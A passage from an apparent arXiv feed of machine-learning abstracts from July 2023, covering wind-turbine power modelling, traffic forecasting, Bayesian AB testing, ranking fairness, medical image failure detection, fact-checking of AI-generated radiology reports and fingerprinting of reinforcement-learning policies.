    The ever-growing use of wind energy makes necessary the optimization of turbine operations through pitch angle controllers and their maintenance with early fault detection. It is crucial to have accurate and robust models imitating the behavior of wind turbines, especially to predict the generated power as a function of the wind speed. Existing empirical and physics-based models have limitations in capturing the complex relations between the input variables and the power, aggravated by wind variability. Data-driven methods offer new opportunities to enhance wind turbine modeling of large datasets by improving accuracy and efficiency. In this study, we used physics-informed neural networks to reproduce historical data coming from 4 turbines in a wind farm, while imposing certain physical constraints to the model. The developed models for regression of the power, torque, and power coefficient as output variables showed great accuracy for both real data and physical equations governing the system. Lastly, introducing an efficient evidential layer provided uncertainty estimations of the predictions, proved to be consistent with the absolute error, and made possible the definition of a confidence interval in the power curve.
    Robust Assignment of Labels for Active Learning with Sparse and Noisy Annotations. (arXiv:2307.14380v1 [cs.LG])
    Supervised classification algorithms are used to solve a growing number of real-life problems around the globe. Their performance is strictly connected with the quality of labels used in training. Unfortunately, acquiring good-quality annotations for many tasks is infeasible or too expensive to be done in practice. To tackle this challenge, active learning algorithms are commonly employed to select only the most relevant data for labeling. However, this is possible only when the quality and quantity of labels acquired from experts are sufficient. Unfortunately, in many applications, a trade-off between annotating individual samples by multiple annotators to increase label quality vs. annotating new samples to increase the total number of labeled instances is necessary. In this paper, we address the issue of faulty data annotations in the context of active learning. In particular, we propose two novel annotation unification algorithms that utilize unlabeled parts of the sample space. The proposed methods require little to no intersection between samples annotated by different experts. Our experiments on four public datasets indicate the robustness and superiority of the proposed methods in both, the estimation of the annotator's reliability, and the assignment of actual labels, against the state-of-the-art algorithms and the simple majority voting.
    HUTFormer: Hierarchical U-Net Transformer for Long-Term Traffic Forecasting. (arXiv:2307.14596v1 [cs.LG])
    Traffic forecasting, which aims to predict traffic conditions based on historical observations, has been an enduring research topic and is widely recognized as an essential component of intelligent transportation. Recent proposals on Spatial-Temporal Graph Neural Networks (STGNNs) have made significant progress by combining sequential models with graph convolution networks. However, due to high complexity issues, STGNNs only focus on short-term traffic forecasting, e.g., 1-hour forecasting, while ignoring more practical long-term forecasting. In this paper, we make the first attempt to explore long-term traffic forecasting, e.g., 1-day forecasting. To this end, we first reveal its unique challenges in exploiting multi-scale representations. Then, we propose a novel Hierarchical U-net TransFormer (HUTFormer) to address the issues of long-term traffic forecasting. HUTFormer consists of a hierarchical encoder and decoder to jointly generate and utilize multi-scale representations of traffic data. Specifically, for the encoder, we propose window self-attention and segment merging to extract multi-scale representations from long-term traffic data. For the decoder, we design a cross-scale attention mechanism to effectively incorporate multi-scale representations. In addition, HUTFormer employs an efficient input embedding strategy to address the complexity issues. Extensive experiments on four traffic datasets show that the proposed HUTFormer significantly outperforms state-of-the-art traffic forecasting and long time series forecasting baselines.
    Rapid and Scalable Bayesian AB Testing. (arXiv:2307.14628v1 [cs.LG])
    AB testing aids business operators with their decision making, and is considered the gold standard method for learning from data to improve digital user experiences. However, there is usually a gap between the requirements of practitioners, and the constraints imposed by the statistical hypothesis testing methodologies commonly used for analysis of AB tests. These include the lack of statistical power in multivariate designs with many factors, correlations between these factors, the need of sequential testing for early stopping, and the inability to pool knowledge from past tests. Here, we propose a solution that applies hierarchical Bayesian estimation to address the above limitations. In comparison to current sequential AB testing methodology, we increase statistical power by exploiting correlations between factors, enabling sequential testing and progressive early stopping, without incurring excessive false positive risk. We also demonstrate how this methodology can be extended to enable the extraction of composite global learnings from past AB tests, to accelerate future tests. We underpin our work with a solid theoretical framework that articulates the value of hierarchical estimation. We demonstrate its utility using both numerical simulations and a large set of real-world AB tests. Together, these results highlight the practical value of our approach for statistical inference in the technology industry.
    Bipartite Ranking Fairness through a Model Agnostic Ordering Adjustment. (arXiv:2307.14668v1 [cs.LG])
    Algorithmic fairness has been a serious concern and received lots of interest in machine learning community. In this paper, we focus on the bipartite ranking scenario, where the instances come from either the positive or negative class and the goal is to learn a ranking function that ranks positive instances higher than negative ones. While there could be a trade-off between fairness and performance, we propose a model agnostic post-processing framework xOrder for achieving fairness in bipartite ranking and maintaining the algorithm classification performance. In particular, we optimize a weighted sum of the utility as identifying an optimal warping path across different protected groups and solve it through a dynamic programming process. xOrder is compatible with various classification models and ranking fairness metrics, including supervised and unsupervised fairness metrics. In addition to binary groups, xOrder can be applied to multiple protected groups. We evaluate our proposed algorithm on four benchmark data sets and two real-world patient electronic health record repositories. xOrder consistently achieves a better balance between the algorithm utility and ranking fairness on a variety of datasets with different metrics. From the visualization of the calibrated ranking scores, xOrder mitigates the score distribution shifts of different groups compared with baselines. Moreover, additional analytical results verify that xOrder achieves a robust performance when faced with fewer samples and a bigger difference between training and testing ranking score distributions.
    Complete and separate: Conditional separation with missing target source attribute completion. (arXiv:2307.14609v1 [cs.SD])
    Recent approaches in source separation leverage semantic information about their input mixtures and constituent sources that when used in conditional separation models can achieve impressive performance. Most approaches along these lines have focused on simple descriptions, which are not always useful for varying types of input mixtures. In this work, we present an approach in which a model, given an input mixture and partial semantic information about a target source, is trained to extract additional semantic data. We then leverage this pre-trained model to improve the separation performance of an uncoupled multi-conditional separation network. Our experiments demonstrate that the separation performance of this multi-conditional model is significantly improved, approaching the performance of an oracle model with complete semantic information. Furthermore, our approach achieves performance levels that are comparable to those of the best performing specialized single conditional models, thus providing an easier to use alternative.
    Understanding Silent Failures in Medical Image Classification. (arXiv:2307.14729v1 [eess.IV])
    To ensure the reliable use of classification systems in medical applications, it is crucial to prevent silent failures. This can be achieved by either designing classifiers that are robust enough to avoid failures in the first place, or by detecting remaining failures using confidence scoring functions (CSFs). A predominant source of failures in image classification is distribution shifts between training data and deployment data. To understand the current state of silent failure prevention in medical imaging, we conduct the first comprehensive analysis comparing various CSFs in four biomedical tasks and a diverse range of distribution shifts. Based on the result that none of the benchmarked CSFs can reliably prevent silent failures, we conclude that a deeper understanding of the root causes of failures in the data is required. To facilitate this, we introduce SF-Visuals, an interactive analysis tool that uses latent space clustering to visualize shifts and failures. On the basis of various examples, we demonstrate how this tool can help researchers gain insight into the requirements for safe application of classification systems in the medical domain. The open-source benchmark and tool are at: https://github.com/IML-DKFZ/sf-visuals.
    Prot2Text: Multimodal Protein's Function Generation with GNNs and Transformers. (arXiv:2307.14367v1 [q-bio.QM])
    The complex nature of big biological systems pushed some scientists to classify its understanding under the inconceivable missions. Different leveled challenges complicated this task, one of is the prediction of a protein's function. In recent years, significant progress has been made in this field through the development of various machine learning approaches. However, most existing methods formulate the task as a multi-classification problem, i.e assigning predefined labels to proteins. In this work, we propose a novel approach, \textbf{Prot2Text}, which predicts a protein function's in a free text style, moving beyond the conventional binary or categorical classifications. By combining Graph Neural Networks(GNNs) and Large Language Models(LLMs), in an encoder-decoder framework, our model effectively integrates diverse data types including proteins' sequences, structures, and textual annotations. This multimodal approach allows for a holistic representation of proteins' functions, enabling the generation of detailed and accurate descriptions. To evaluate our model, we extracted a multimodal protein dataset from SwissProt, and demonstrate empirically the effectiveness of Prot2Text. These results highlight the transformative impact of multimodal models, specifically the fusion of GNNs and LLMs, empowering researchers with powerful tools for more accurate prediction of proteins' functions. The code, the models and a demo will be publicly released.
    Synergies Between Federated Learning and O-RAN: Towards an Elastic Virtualized Architecture for Multiple Distributed Machine Learning Services. (arXiv:2305.02109v2 [cs.NI] UPDATED)
    Federated learning (FL) is the most popular distributed machine learning technique. However, implementation of FL over modern wireless networks faces key challenges caused by (i) dynamics of the network conditions and (ii) the coexistence of multiple FL services/tasks and other network services in the system, which are not jointly considered in prior works. Motivated by these challenges, we introduce a generic FL paradigm over NextG networks, called dynamic multi-service FL (DMS-FL). We identify three unexplored design considerations in DMS-FL: (i) FL service operator accumulation, (ii) wireless resource fragmentation, and (iii) signal strength fluctuations. We take the first steps towards addressing these design considerations by proposing a novel distributed ML architecture called elastic virtualized FL (EV-FL). EV-FL unleashes the full potential of Open RAN (O-RAN) systems and introduces an elastic resource provisioning methodology to execute FL services. It further constitutes a multi-time-scale FL management system that introduces three dimensions into existing FL architectures: (i) virtualization, (ii) scalability, and (iii) elasticity. Through investigating EV-FL, we reveal a series of open research directions for future work. We finally simulate EV-FL to demonstrate its potential in saving wireless resources and increasing fairness among FL services.
    A Predictive Model of Digital Information Engagement: Forecasting User Engagement With English Words by Incorporating Cognitive Biases, Computational Linguistics and Natural Language Processing. (arXiv:2307.14500v1 [cs.HC])
    This study introduces and empirically tests a novel predictive model for digital information engagement (IE) - the READ model, an acronym for the four pivotal attributes of engaging information: Representativeness, Ease-of-use, Affect, and Distribution. Conceptualized within the theoretical framework of Cumulative Prospect Theory, the model integrates key cognitive biases with computational linguistics and natural language processing to develop a multidimensional perspective on information engagement. A rigorous testing protocol was implemented, involving 50 randomly selected pairs of synonymous words (100 words in total) from the WordNet database. These words' engagement levels were evaluated through a large-scale online survey (n = 80,500) to derive empirical IE metrics. The READ attributes for each word were then computed and their predictive efficacy examined. The findings affirm the READ model's robustness, accurately predicting a word's IE level and distinguishing the more engaging word from a pair of synonyms with an 84% accuracy rate. The READ model's potential extends across various domains, including business, education, government, and healthcare, where it could enhance content engagement and inform AI language model development and generative text work. Future research should address the model's scalability and adaptability across different domains and languages, thereby broadening its applicability and efficacy.
    Controlling the Inductive Bias of Wide Neural Networks by Modifying the Kernel's Spectrum. (arXiv:2307.14531v1 [cs.LG])
    Wide neural networks are biased towards learning certain functions, influencing both the rate of convergence of gradient descent (GD) and the functions that are reachable with GD in finite training time. As such, there is a great need for methods that can modify this bias according to the task at hand. To that end, we introduce Modified Spectrum Kernels (MSKs), a novel family of constructed kernels that can be used to approximate kernels with desired eigenvalues for which no closed form is known. We leverage the duality between wide neural networks and Neural Tangent Kernels and propose a preconditioned gradient descent method, which alters the trajectory of GD. As a result, this allows for a polynomial and, in some cases, exponential training speedup without changing the final solution. Our method is both computationally efficient and simple to implement.
    Spatial-Frequency U-Net for Denoising Diffusion Probabilistic Models. (arXiv:2307.14648v1 [cs.CV])
    In this paper, we study the denoising diffusion probabilistic model (DDPM) in wavelet space, instead of pixel space, for visual synthesis. Considering the wavelet transform represents the image in spatial and frequency domains, we carefully design a novel architecture SFUNet to effectively capture the correlation for both domains. Specifically, in the standard denoising U-Net for pixel data, we supplement the 2D convolutions and spatial-only attention layers with our spatial frequency-aware convolution and attention modules to jointly model the complementary information from spatial and frequency domains in wavelet data. Our new architecture can be used as a drop-in replacement to the pixel-based network and is compatible with the vanilla DDPM training process. By explicitly modeling the wavelet signals, we find our model is able to generate images with higher quality on CIFAR-10, FFHQ, LSUN-Bedroom, and LSUN-Church datasets, than the pixel-based counterpart.
    HyperFed: Hyperbolic Prototypes Exploration with Consistent Aggregation for Non-IID Data in Federated Learning. (arXiv:2307.14384v1 [cs.LG])
    Federated learning (FL) collaboratively models user data in a decentralized way. However, in the real world, non-identical and independent data distributions (non-IID) among clients hinder the performance of FL due to three issues, i.e., (1) the class statistics shifting, (2) the insufficient hierarchical information utilization, and (3) the inconsistency in aggregating clients. To address the above issues, we propose HyperFed which contains three main modules, i.e., hyperbolic prototype Tammes initialization (HPTI), hyperbolic prototype learning (HPL), and consistent aggregation (CA). Firstly, HPTI in the server constructs uniformly distributed and fixed class prototypes, and shares them with clients to match class statistics, further guiding consistent feature representation for local clients. Secondly, HPL in each client captures the hierarchical information in local data with the supervision of shared class prototypes in the hyperbolic model space. Additionally, CA in the server mitigates the impact of the inconsistent deviations from clients to server. Extensive studies of four datasets prove that HyperFed is effective in enhancing the performance of FL under the non-IID set.
    Fact-Checking of AI-Generated Reports. (arXiv:2307.14634v1 [cs.AI])
    With advances in generative artificial intelligence (AI), it is now possible to produce realistic-looking automated reports for preliminary reads of radiology images. This can expedite clinical workflows, improve accuracy and reduce overall costs. However, it is also well-known that such models often hallucinate, leading to false findings in the generated reports. In this paper, we propose a new method of fact-checking of AI-generated reports using their associated images. Specifically, the developed examiner differentiates real and fake sentences in reports by learning the association between an image and sentences describing real or potentially fake findings. To train such an examiner, we first created a new dataset of fake reports by perturbing the findings in the original ground truth radiology reports associated with images. Text encodings of real and fake sentences drawn from these reports are then paired with image encodings to learn the mapping to real/fake labels. The utility of such an examiner is demonstrated for verifying automatically generated reports by detecting and removing fake sentences. Future generative AI approaches can use the resulting tool to validate their reports leading to a more responsible use of AI in expediting clinical workflows.
    NSA: Naturalistic Support Artifact to Boost Network Confidence. (arXiv:2307.14917v1 [cs.CV])
    Visual AI systems are vulnerable to natural and synthetic physical corruption in the real-world. Such corruption often arises unexpectedly and alters the model's performance. In recent years, the primary focus has been on adversarial attacks. However, natural corruptions (e.g., snow, fog, dust) are an omnipresent threat to visual AI systems and should be considered equally important. Many existing works propose interesting solutions to train robust models against natural corruption. These works either leverage image augmentations, which come with the additional cost of model training, or place suspicious patches in the scene to design unadversarial examples. In this work, we propose the idea of naturalistic support artifacts (NSA) for robust prediction. The NSAs are shown to be beneficial in scenarios where model parameters are inaccessible and adding artifacts in the scene is feasible. The NSAs are natural looking objects generated through artifact training using DC-GAN to have high visual fidelity in the scene. We test against natural corruptions on the Imagenette dataset and observe the improvement in prediction confidence score by four times. We also demonstrate NSA's capability to increase adversarial accuracy by 8\% on average. Lastly, we qualitatively analyze NSAs using saliency maps to understand how they help improve prediction confidence.
    DBGSA: A Novel Data Adaptive Bregman Clustering Algorithm. (arXiv:2307.14375v1 [cs.LG])
    With the development of Big data technology, data analysis has become increasingly important. Traditional clustering algorithms such as K-means are highly sensitive to the initial centroid selection and perform poorly on non-convex datasets. In this paper, we address these problems by proposing a data-driven Bregman divergence parameter optimization clustering algorithm (DBGSA), which combines the Universal Gravitational Algorithm to bring similar points closer in the dataset. We construct a gravitational coefficient equation with a special property that gradually reduces the influence factor as the iteration progresses. Furthermore, we introduce the Bregman divergence generalized power mean information loss minimization to identify cluster centers and build a hyperparameter identification optimization model, which effectively solves the problems of manual adjustment and uncertainty in the improved dataset. Extensive experiments are conducted on four simulated datasets and six real datasets. The results demonstrate that DBGSA significantly improves the accuracy of various clustering algorithms by an average of 63.8\% compared to other similar approaches like enhanced clustering algorithms and improved datasets. Additionally, a three-dimensional grid search was established to compare the effects of different parameter values within threshold conditions, and it was discovered the parameter set provided by our model is optimal. This finding provides strong evidence of the high accuracy and robustness of the algorithm.
    Prediction of depression status in college students using a Naive Bayes classifier based machine learning model. (arXiv:2307.14371v1 [cs.LG])
    This study presents a machine learning model based on the Naive Bayes classifier for predicting the level of depression in university students, the objective was to improve prediction accuracy using a machine learning model involving 70% training data and 30% validation data based on the Naive Bayes classifier, the collected data includes factors associated with depression from 519 university students, the results showed an accuracy of 78.03%, high sensitivity in detecting positive cases of depression, especially at moderate and severe levels, and significant specificity in correctly classifying negative cases, these findings highlight the effectiveness of the model in early detection and treatment of depression, benefiting vulnerable sectors and contributing to the improvement of mental health in the student population.
    Limits to Reservoir Learning. (arXiv:2307.14474v1 [cs.LG])
    In this work, we bound a machine's ability to learn based on computational limitations implied by physicality. We start by considering the information processing capacity (IPC), a normalized measure of the expected squared error of a collection of signals to a complete basis of functions. We use the IPC to measure the degradation under noise of the performance of reservoir computers, a particular kind of recurrent network, when constrained by physical considerations. First, we show that the IPC is at most a polynomial in the system size $n$, even when considering the collection of $2^n$ possible pointwise products of the $n$ output signals. Next, we argue that this degradation implies that the family of functions represented by the reservoir requires an exponential number of samples to learn in the presence of the reservoir's noise. Finally, we conclude with a discussion of the performance of the same collection of $2^n$ functions without noise when being used for binary classification.
    Learned Gridification for Efficient Point Cloud Processing. (arXiv:2307.14354v1 [cs.CV])
    Neural operations that rely on neighborhood information are much more expensive when deployed on point clouds than on grid data due to the irregular distances between points in a point cloud. In a grid, on the other hand, we can compute the kernel only once and reuse it for all query positions. As a result, operations that rely on neighborhood information scale much worse for point clouds than for grid data, specially for large inputs and large neighborhoods. In this work, we address the scalability issue of point cloud methods by tackling its root cause: the irregularity of the data. We propose learnable gridification as the first step in a point cloud processing pipeline to transform the point cloud into a compact, regular grid. Thanks to gridification, subsequent layers can use operations defined on regular grids, e.g., Conv3D, which scale much better than native point cloud methods. We then extend gridification to point cloud to point cloud tasks, e.g., segmentation, by adding a learnable de-gridification step at the end of the point cloud processing pipeline to map the compact, regular grid back to its original point cloud form. Through theoretical and empirical analysis, we show that gridified networks scale better in terms of memory and time than networks directly applied on raw point cloud data, while being able to achieve competitive results. Our code is publicly available at https://github.com/computri/gridifier.
    VISPUR: Visual Aids for Identifying and Interpreting Spurious Associations in Data-Driven Decisions. (arXiv:2307.14448v1 [cs.HC])
    Big data and machine learning tools have jointly empowered humans in making data-driven decisions. However, many of them capture empirical associations that might be spurious due to confounding factors and subgroup heterogeneity. The famous Simpson's paradox is such a phenomenon where aggregated and subgroup-level associations contradict with each other, causing cognitive confusions and difficulty in making adequate interpretations and decisions. Existing tools provide little insights for humans to locate, reason about, and prevent pitfalls of spurious association in practice. We propose VISPUR, a visual analytic system that provides a causal analysis framework and a human-centric workflow for tackling spurious associations. These include a CONFOUNDER DASHBOARD, which can automatically identify possible confounding factors, and a SUBGROUP VIEWER, which allows for the visualization and comparison of diverse subgroup patterns that likely or potentially result in a misinterpretation of causality. Additionally, we propose a REASONING STORYBOARD, which uses a flow-based approach to illustrate paradoxical phenomena, as well as an interactive DECISION DIAGNOSIS panel that helps ensure accountable decision-making. Through an expert interview and a controlled user experiment, our qualitative and quantitative results demonstrate that the proposed "de-paradox" workflow and the designed visual analytic system are effective in helping human users to identify and understand spurious associations, as well as to make accountable causal decisions.
    Piecewise Linear Functions Representable with Infinite Width Shallow ReLU Neural Networks. (arXiv:2307.14373v1 [cs.LG])
    This paper analyzes representations of continuous piecewise linear functions with infinite width, finite cost shallow neural networks using the rectified linear unit (ReLU) as an activation function. Through its integral representation, a shallow neural network can be identified by the corresponding signed, finite measure on an appropriate parameter space. We map these measures on the parameter space to measures on the projective $n$-sphere cross $\mathbb{R}$, allowing points in the parameter space to be bijectively mapped to hyperplanes in the domain of the function. We prove a conjecture of Ongie et al. that every continuous piecewise linear function expressible with this kind of infinite width neural network is expressible as a finite width shallow ReLU neural network.
    Learnable wavelet neural networks for cosmological inference. (arXiv:2307.14362v1 [astro-ph.IM])
    Convolutional neural networks (CNNs) have been shown to both extract more information than the traditional two-point statistics from cosmological fields, and marginalise over astrophysical effects extremely well. However, CNNs require large amounts of training data, which is potentially problematic in the domain of expensive cosmological simulations, and it is difficult to interpret the network. In this work we apply the learnable scattering transform, a kind of convolutional neural network that uses trainable wavelets as filters, to the problem of cosmological inference and marginalisation over astrophysical effects. We present two models based on the scattering transform, one constructed for performance, and one constructed for interpretability, and perform a comparison with a CNN. We find that scattering architectures are able to outperform a CNN, significantly in the case of small training data samples. Additionally we present a lightweight scattering network that is highly interpretable.
    Forecasting, capturing and activation of carbon-dioxide (CO$_2$): Integration of Time Series Analysis, Machine Learning, and Material Design. (arXiv:2307.14374v1 [cs.LG])
    This study provides a comprehensive time series analysis of daily industry-specific, country-wise CO$_2$ emissions from January 2019 to February 2023. The research focuses on the Power, Industry, Ground Transport, Domestic Aviation, and International Aviation sectors in European countries (EU27 & UK, Italy, Germany, Spain) and India, utilizing near-real-time activity data from the Carbon Monitor research initiative. To identify regular emission patterns, the data from the year 2020 is excluded due to the disruptive effects caused by the COVID-19 pandemic. The study then performs a principal component analysis (PCA) to determine the key contributors to CO$_2$ emissions. The analysis reveals that the Power, Industry, and Ground Transport sectors account for a significant portion of the variance in the dataset. A 7-day moving averaged dataset is employed for further analysis to facilitate robust predictions. This dataset captures both short-term and long-term trends and enhances the quality of the data for prediction purposes. The study utilizes Long Short-Term Memory (LSTM) models on the 7-day moving averaged dataset to effectively predict emissions and provide insights for policy decisions, mitigation strategies, and climate change efforts. During the training phase, the stability and convergence of the LSTM models are ensured, which guarantees their reliability in the testing phase. The evaluation of the loss function indicates this reliability. The model achieves high efficiency, as demonstrated by $R^2$ values ranging from 0.8242 to 0.995 for various countries and sectors. Furthermore, there is a proposal for utilizing scandium and boron/aluminium-based thin films as exceptionally efficient materials for capturing CO$_2$ (with a binding energy range from -3.0 to -3.5 eV). These materials are shown to surpass the affinity of graphene and boron nitride sheets in this regard.
    HUGE: Huge Unsupervised Graph Embeddings with TPUs. (arXiv:2307.14490v1 [cs.LG])
    Graphs are a representation of structured data that captures the relationships between sets of objects. With the ubiquity of available network data, there is increasing industrial and academic need to quickly analyze graphs with billions of nodes and trillions of edges. A common first step for network understanding is Graph Embedding, the process of creating a continuous representation of nodes in a graph. A continuous representation is often more amenable, especially at scale, for solving downstream machine learning tasks such as classification, link prediction, and clustering. A high-performance graph embedding architecture leveraging Tensor Processing Units (TPUs) with configurable amounts of high-bandwidth memory is presented that simplifies the graph embedding problem and can scale to graphs with billions of nodes and trillions of edges. We verify the embedding space quality on real and synthetic large-scale datasets.
    Learning to simulate partially known spatio-temporal dynamics with trainable difference operators. (arXiv:2307.14395v1 [cs.LG])
    Recently, using neural networks to simulate spatio-temporal dynamics has received a lot of attention. However, most existing methods adopt pure data-driven black-box models, which have limited accuracy and interpretability. By combining trainable difference operators with black-box models, we propose a new hybrid architecture explicitly embedded with partial prior knowledge of the underlying PDEs named PDE-Net++. Furthermore, we introduce two distinct options called the trainable flipping difference layer (TFDL) and the trainable dynamic difference layer (TDDL) for the difference operators. Numerous numerical experiments have demonstrated that PDE-Net++ has superior prediction accuracy and better extrapolation performance than black-box models.
    The Effect of Spoken Language on Speech Enhancement using Self-Supervised Speech Representation Loss Functions. (arXiv:2307.14502v1 [eess.AS])
    Recent work in the field of speech enhancement (SE) has involved the use of self-supervised speech representations (SSSRs) as feature transformations in loss functions. However, in prior work, very little attention has been paid to the relationship between the language of the audio used to train the self-supervised representation and that used to train the SE system. Enhancement models trained using a loss function which incorporates a self-supervised representation that shares exactly the language of the noisy data used to train the SE system show better performance than those which do not match exactly. This may lead to enhancement systems which are language specific and as such do not generalise well to unseen languages, unlike models trained using traditional spectrogram or time domain loss functions. In this work, SE models are trained and tested on a number of different languages, with self-supervised representations which themselves are trained using different language combinations and with differing network structures as loss function representations. These models are then tested across unseen languages and their performances are analysed. It is found that the training language of the self-supervised representation appears to have a minor effect on enhancement performance, the amount of training data of a particular language, however, greatly affects performance.
    Federated Distributionally Robust Optimization with Non-Convex Objectives: Algorithm and Analysis. (arXiv:2307.14364v1 [math.OC])
    Distributionally Robust Optimization (DRO), which aims to find an optimal decision that minimizes the worst case cost over the ambiguity set of probability distribution, has been widely applied in diverse applications, e.g., network behavior analysis, risk management, etc. However, existing DRO techniques face three key challenges: 1) how to deal with the asynchronous updating in a distributed environment; 2) how to leverage the prior distribution effectively; 3) how to properly adjust the degree of robustness according to different scenarios. To this end, we propose an asynchronous distributed algorithm, named Asynchronous Single-looP alternatIve gRadient projEction (ASPIRE) algorithm with the itErative Active SEt method (EASE) to tackle the federated distributionally robust optimization (FDRO) problem. Furthermore, a new uncertainty set, i.e., constrained D-norm uncertainty set, is developed to effectively leverage the prior distribution and flexibly control the degree of robustness. Finally, our theoretical analysis elucidates that the proposed algorithm is guaranteed to converge and the iteration complexity is also analyzed. Extensive empirical studies on real-world datasets demonstrate that the proposed method can not only achieve fast convergence, and remain robust against data heterogeneity as well as malicious attacks, but also tradeoff robustness with performance.
    What Kinds of Contracts Do ML APIs Need?. (arXiv:2307.14465v1 [cs.SE])
    Recent work has shown that Machine Learning (ML) programs are error-prone and called for contracts for ML code. Contracts, as in the design by contract methodology, help document APIs and aid API users in writing correct code. The question is: what kinds of contracts would provide the most help to API users? We are especially interested in what kinds of contracts help API users catch errors at earlier stages in the ML pipeline. We describe an empirical study of posts on Stack Overflow of the four most often-discussed ML libraries: TensorFlow, Scikit-learn, Keras, and PyTorch. For these libraries, our study extracted 413 informal (English) API specifications. We used these specifications to understand the following questions. What are the root causes and effects behind ML contract violations? Are there common patterns of ML contract violations? When does understanding ML contracts require an advanced level of ML software expertise? Could checking contracts at the API level help detect the violations in early ML pipeline stages? Our key findings are that the most commonly needed contracts for ML APIs are either checking constraints on single arguments of an API or on the order of API calls. The software engineering community could employ existing contract mining approaches to mine these contracts to promote an increased understanding of ML APIs. We also noted a need to combine behavioral and temporal contract mining approaches. We report on categories of required ML contracts, which may help designers of contract languages.
    Unsupervised reconstruction of accelerated cardiac cine MRI using Neural Fields. (arXiv:2307.14363v1 [eess.IV])
    Cardiac cine MRI is the gold standard for cardiac functional assessment, but the inherently slow acquisition process creates the necessity of reconstruction approaches for accelerated undersampled acquisitions. Several regularization approaches that exploit spatial-temporal redundancy have been proposed to reconstruct undersampled cardiac cine MRI. More recently, methods based on supervised deep learning have been also proposed to further accelerate acquisition and reconstruction. However, these techniques rely on usually large dataset for training, which are not always available. In this work, we propose an unsupervised approach based on implicit neural field representations for cardiac cine MRI (so called NF-cMRI). The proposed method was evaluated in in-vivo undersampled golden-angle radial multi-coil acquisitions for undersampling factors of 26x and 52x, achieving good image quality, and comparable spatial and improved temporal depiction than a state-of-the-art reconstruction technique.
    Optimal Estimation in Mixed-Membership Stochastic Block Models. (arXiv:2307.14530v1 [stat.ML])
    Community detection is one of the most critical problems in modern network science. Its applications can be found in various fields, from protein modeling to social network analysis. Recently, many papers appeared studying the problem of overlapping community detection, where each node of a network may belong to several communities. In this work, we consider Mixed-Membership Stochastic Block Model (MMSB) first proposed by Airoldi et al. (2008). MMSB provides quite a general setting for modeling overlapping community structure in graphs. The central question of this paper is to reconstruct relations between communities given an observed network. We compare different approaches and establish the minimax lower bound on the estimation error. Then, we propose a new estimator that matches this lower bound. Theoretical results are proved under fairly general conditions on the considered model. Finally, we illustrate the theory in a series of experiments.
    A Survey on Generative Modeling with Limited Data, Few Shots, and Zero Shot. (arXiv:2307.14397v1 [cs.CV])
    In machine learning, generative modeling aims to learn to generate new data statistically similar to the training data distribution. In this paper, we survey learning generative models under limited data, few shots and zero shot, referred to as Generative Modeling under Data Constraint (GM-DC). This is an important topic when data acquisition is challenging, e.g. healthcare applications. We discuss background, challenges, and propose two taxonomies: one on GM-DC tasks and another on GM-DC approaches. Importantly, we study interactions between different GM-DC tasks and approaches. Furthermore, we highlight research gaps, research trends, and potential avenues for future exploration. Project website: https://gmdc-survey.github.io.
    Neural Networks for Scalar Input and Functional Output. (arXiv:2208.05776v2 [stat.ML] UPDATED)
    The regression of a functional response on a set of scalar predictors can be a challenging task, especially if there is a large number of predictors, or the relationship between those predictors and the response is nonlinear. In this work, we propose a solution to this problem: a feed-forward neural network (NN) designed to predict a functional response using scalar inputs. First, we transform the functional response to a finite-dimensional representation and construct an NN that outputs this representation. Then, we propose to modify the output of an NN via the objective function and introduce different objective functions for network training. The proposed models are suited for both regularly and irregularly spaced data, and a roughness penalty can be further applied to control the smoothness of the predicted curve. The difficulty in implementing both those features lies in the definition of objective functions that can be back-propagated. In our experiments, we demonstrate that our model outperforms the conventional function-on-scalar regression model in multiple scenarios while computationally scaling better with the dimension of the predictors.
    From Contextual Data to Newsvendor Decisions: On the Actual Performance of Data-Driven Algorithms. (arXiv:2302.08424v3 [cs.LG] UPDATED)
    In this work, we explore a framework for contextual decision-making to study how the relevance and quantity of past data affects the performance of a data-driven policy. We analyze a contextual Newsvendor problem in which a decision-maker needs to trade-off between an underage and an overage cost in the face of uncertain demand. We consider a setting in which past demands observed under ``close by'' contexts come from close by distributions and analyze the performance of data-driven algorithms through a notion of context-dependent worst-case expected regret. We analyze the broad class of Weighted Empirical Risk Minimization (WERM) policies which weigh past data according to their similarity in the contextual space. This class includes classical policies such as ERM, k-Nearest Neighbors and kernel-based policies. Our main methodological contribution is to characterize exactly the worst-case regret of any WERM policy on any given configuration of contexts. To the best of our knowledge, this provides the first understanding of tight performance guarantees in any contextual decision-making problem, with past literature focusing on upper bounds via concentration inequalities. We instead take an optimization approach, and isolate a structure in the Newsvendor loss function that allows to reduce the infinite-dimensional optimization problem over worst-case distributions to a simple line search. This in turn allows us to unveil fundamental insights that were obfuscated by previous general-purpose bounds. We characterize actual guaranteed performance as a function of the contexts, as well as granular insights on the learning curve of algorithms.
    On the non-efficient PAC learnability of conjunctive queries. (arXiv:2208.10255v2 [cs.DB] UPDATED)
    This note serves three purposes: (i) we provide a self-contained exposition of the fact that conjunctive queries are not efficiently learnable in the Probably-Approximately-Correct (PAC) model, paying clear attention to the complicating fact that this concept class lacks the polynomial-size fitting property, a property that is tacitly assumed in much of the computational learning theory literature; (ii) we establish a strong negative PAC learnability result that applies to many restricted classes of conjunctive queries (CQs), including acyclic CQs for a wide range of notions of "acyclicity"; (iii) we show that CQs (and UCQs) are efficiently PAC learnable with membership queries.
    FLARE: Fingerprinting Deep Reinforcement Learning Agents using Universal Adversarial Masks. (arXiv:2307.14751v1 [cs.LG])
    We propose FLARE, the first fingerprinting mechanism to verify whether a suspected Deep Reinforcement Learning (DRL) policy is an illegitimate copy of another (victim) policy. We first show that it is possible to find non-transferable, universal adversarial masks, i.e., perturbations, to generate adversarial examples that can successfully transfer from a victim policy to its modified versions but not to independently trained policies. FLARE employs these masks as fingerprints to verify the true ownership of stolen DRL policies by measuring an action agreement value over states perturbed via such masks. Our empirical evaluations show that FLARE is effective (100% action agreement on stolen copies) and does not falsely accuse independent policies (no false positives). FLARE is also robust to model modification attacks and cannot be easily evaded by more informed adversaries without negatively impacting agent performance. We also show that not all universal adversarial masks are suitable candidates for fingerprints due to the inherent characteristics of DRL policies. The spatio-temporal dynamics of DRL problems and sequential decision-making process make characterizing the decision boundary of DRL policies more difficult, as well as searching for universal masks that capture the geometry of it.
    EdgeConvEns: Convolutional Ensemble Learning for Edge Intelligence. (arXiv:2307.14381v1 [cs.LG])
